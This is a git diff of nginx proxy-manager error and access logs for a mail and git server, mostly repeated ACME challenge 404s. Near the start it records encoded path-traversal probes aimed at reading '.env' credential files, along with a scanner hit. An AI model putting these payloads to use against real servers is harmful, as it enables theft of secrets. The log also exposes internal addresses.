/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1" -2026/02/14 23:48:53 [warn] 506#506: *1118 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1" -2026/02/14 23:48:54 [warn] 506#506: *1119 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1" -2026/02/14 23:48:55 [warn] 506#506: *1120 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1" -2026/02/14 23:48:56 [warn] 506#506: *1121 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1" -2026/02/14 23:48:57 [warn] 509#509: *1122 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: mail.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1" -2026/02/15 03:34:47 [warn] 522#522: *5758 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/24/0000002240 while reading upstream, client: 195.178.110.132, server: mail.hanmocnn.co.kr, request: "GET /cache/97de29030b01af5b720989e26703fcf354efbcf2.js HTTP/1.1", upstream: "https://192.168.0.250:8443/cache/97de29030b01af5b720989e26703fcf354efbcf2.js", host: "mail.hanmocnn.co.kr" -2026/02/15 07:04:20 [error] 778#778: *11569 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "POST /rc/?_task=mail&_action=refresh HTTP/2.0", upstream: "https://192.168.0.250:8443/rc/?_task=mail&_action=refresh", host: "mail.hanmocnn.co.kr", referrer: "https://mail.hanmocnn.co.kr/" -2026/02/15 07:05:12 [error] 777#777: *11586 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/132752626722491" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/132752626722491 HTTP/2.0", host: "mail.hanmocnn.co.kr" -2026/02/15 08:05:36 [error] 816#816: *11958 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/22270184778438" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/22270184778438 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 09:06:03 [error] 816#816: *12765 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21520162613543" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21520162613543 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 10:06:26 [error] 817#817: *14716 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2059769144768" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2059769144768 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 11:06:52 [error] 819#819: *16612 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/10128267644309" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/10128267644309 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 12:07:16 [error] 828#828: *16632 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2271132194420" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2271132194420 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 13:07:41 [error] 827#827: *18753 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/15273027815334" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/15273027815334 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 14:08:04 [error] 828#828: *21099 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/48762442931492" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/48762442931492 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 15:08:30 [error] 829#829: *22523 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/7003157898126" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/7003157898126 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 16:08:53 [error] 832#832: *23289 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/242531237110107" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/242531237110107 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 18:09:43 [error] 839#839: *23746 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/716186169298" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/716186169298 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 19:10:06 [error] 845#845: *25314 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/845330302829" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/845330302829 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 20:10:34 [error] 838#838: *25404 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/275614720369" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/275614720369 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 21:10:56 [error] 839#839: *25433 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/298912928363" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/298912928363 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/15 22:11:21 [error] 843#843: *26982 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/293861870717870" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/293861870717870 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 01:12:40 [error] 856#856: *27397 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2628576016059" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2628576016059 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 02:13:04 [error] 856#856: *28968 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/169231832519748" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/169231832519748 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 03:13:28 [error] 855#855: *30597 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/126141764620678" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/126141764620678 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 04:13:54 [error] 856#856: *30684 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/72302304222869" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/72302304222869 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 05:14:20 [error] 856#856: *32383 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/18339859020446" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/18339859020446 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 06:14:46 [error] 861#861: *32494 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/261441212623557" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/261441212623557 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 07:15:17 [error] 866#866: *34145 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/5958188332036" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/5958188332036 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 08:15:40 [error] 867#867: *34192 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/318691426327419" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/318691426327419 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 09:16:03 [error] 860#860: *34289 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/222152590129298" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/222152590129298 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 10:16:28 [error] 862#862: *34395 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/168402213416258" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/168402213416258 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 11:16:53 [error] 862#862: *35911 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/1911311937756" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/1911311937756 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 12:17:18 [error] 877#877: *36000 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25170994713170" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25170994713170 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 13:17:42 [error] 871#871: *36052 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2380247415728" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2380247415728 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 14:18:09 [error] 871#871: *37558 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21241406018869" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21241406018869 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 15:18:31 [error] 871#871: *39220 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/4942946414564" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/4942946414564 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 16:18:54 [error] 874#874: *39234 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/211402764230849" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/211402764230849 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 17:19:17 [error] 874#874: *39255 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3295913714323" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3295913714323 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 18:19:41 [error] 886#886: *39280 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/171872423417227" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/171872423417227 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 19:20:07 [error] 884#884: *39336 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/206392922531069" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/206392922531069 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 20:20:34 [error] 882#882: *39474 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/11464694730725" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/11464694730725 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 21:20:56 [error] 883#883: *39654 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/215274441677" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/215274441677 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 22:21:24 [error] 886#886: *39787 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/17897272979361" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/17897272979361 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/16 23:21:49 [error] 886#886: *39862 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/20678166812577" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/20678166812577 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 00:22:12 [error] 897#897: *40032 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76192759520205" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76192759520205 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 01:22:35 [error] 895#895: *40148 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/138904984342" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/138904984342 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 02:23:01 [error] 895#895: *40347 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3760852418392" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3760852418392 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 03:23:26 [error] 896#896: *40714 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/31925400925461" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/31925400925461 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 04:23:52 [error] 897#897: *40922 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29296462930121" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29296462930121 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 05:24:20 [error] 899#899: *42449 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8775229557005" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8775229557005 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 06:24:44 [error] 908#908: *42484 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/26404614411107" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/26404614411107 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 07:25:11 [error] 913#913: *44023 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/162203037210280" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/162203037210280 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 08:25:35 [error] 913#913: *44057 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/15000139395299" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/15000139395299 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 09:25:59 [error] 906#906: *44107 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/123902837915426" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/123902837915426 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 10:26:22 [error] 913#913: *45616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/185053078217732" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/185053078217732 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 11:26:46 [error] 906#906: *45647 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/6578555819323" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/6578555819323 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 12:27:11 [error] 922#922: *47159 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2804286426223" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2804286426223 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 13:27:35 [error] 924#924: *49877 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/155841106229467" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/155841106229467 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 14:28:01 [error] 917#917: *54223 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/21337180706381" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/21337180706381 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 15:28:23 [error] 917#917: *59840 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25112267021969" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25112267021969 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 16:28:48 [error] 917#917: *67902 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/354784396374" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/354784396374 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 17:29:13 [error] 920#920: *74708 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/315722950220654" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/315722950220654 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 18:29:36 [error] 933#933: *80974 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/259151616618584" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/259151616618584 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 19:29:58 [error] 935#935: *89640 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/20871894712564" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/20871894712564 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 21:30:48 [error] 934#934: *92656 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8218176617090" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8218176617090 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 22:31:13 [error] 928#928: *92781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/1185790923909" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/1185790923909 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/17 23:31:39 [error] 928#928: *93030 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8643163407278" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8643163407278 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 00:32:01 [error] 946#946: *93258 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/985854727990" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/985854727990 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 01:32:23 [error] 942#942: *93476 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/30312320418403" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/30312320418403 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 02:32:47 [error] 939#939: *93556 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/5977297493722" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/5977297493722 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 03:33:13 [error] 943#943: *93664 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/66232682630494" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/66232682630494 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 04:33:38 [error] 943#943: *93729 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19312097525391" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19312097525391 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 05:34:01 [error] 941#941: *93756 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13353443411800" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13353443411800 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 06:34:23 [error] 955#955: *96807 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/76892721029507" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/76892721029507 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 07:34:47 [error] 956#956: *96901 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/749408432210" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/749408432210 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 10:36:09 [error] 950#950: *97000 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/29692719730346" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/29692719730346 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 11:36:34 [error] 952#952: *98616 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/302411196212851" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/302411196212851 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 12:36:57 [error] 964#964: *98743 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/16296355028267" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/16296355028267 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 13:37:20 [error] 968#968: *100443 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/28058106558622" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/28058106558622 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 14:37:43 [error] 968#968: *100689 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/25402311981443" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/25402311981443 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 15:38:05 [error] 962#962: *100707 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/2010270943770" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/2010270943770 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 16:38:31 [error] 961#961: *100725 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/19835181027399" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/19835181027399 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 17:38:54 [error] 963#963: *100781 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/13394307029520" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/13394307029520 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 18:39:22 [error] 978#978: *100804 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/296711207917157" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/296711207917157 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 19:39:45 [error] 972#972: *100822 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/4540805912569" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/4540805912569 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 20:40:09 [error] 973#973: *100933 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/8014472331921" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/8014472331921 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 21:40:31 [error] 972#972: *102585 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/183921038210713" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/183921038210713 HTTP/1.1", host: "mail.hanmocnn.co.kr" -2026/02/18 22:40:56 [error] 973#973: *102682 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/289971436316962" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/289971436316962 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/19 00:41:44 [error] 990#990: *104419 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/601013513494" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/601013513494 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/19 01:42:14 [error] 991#991: *107643 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/202062540623129" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/202062540623129 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/19 02:42:39 [error] 990#990: *107888 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/94071660517770" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/94071660517770 HTTP/1.1", host: "mail.hanmocnn.co.kr" +2026/02/19 03:43:01 [error] 992#992: *108173 open() "/data/letsencrypt-acme-challenge/.well-known/acme-challenge/3119059711509" failed (2: No such file or directory), client: 222.117.41.51, server: mail.hanmocnn.co.kr, request: "GET /.well-known/acme-challenge/3119059711509 HTTP/1.1", host: "mail.hanmocnn.co.kr" diff --git a/npm/data/logs/proxy-host-4_access.log b/npm/data/logs/proxy-host-4_access.log index 11c9d4b..3d0a414 100644 --- a/npm/data/logs/proxy-host-4_access.log +++ b/npm/data/logs/proxy-host-4_access.log @@ -1,53157 +1,80 @@ -[15/Feb/2026:01:52:09 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/" -[15/Feb/2026:01:52:12 +0000] - - 400 - - https git.hanmocnn.co.kr "-" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to ] "-" "-" -[15/Feb/2026:01:52:12 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[15/Feb/2026:01:52:13 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] 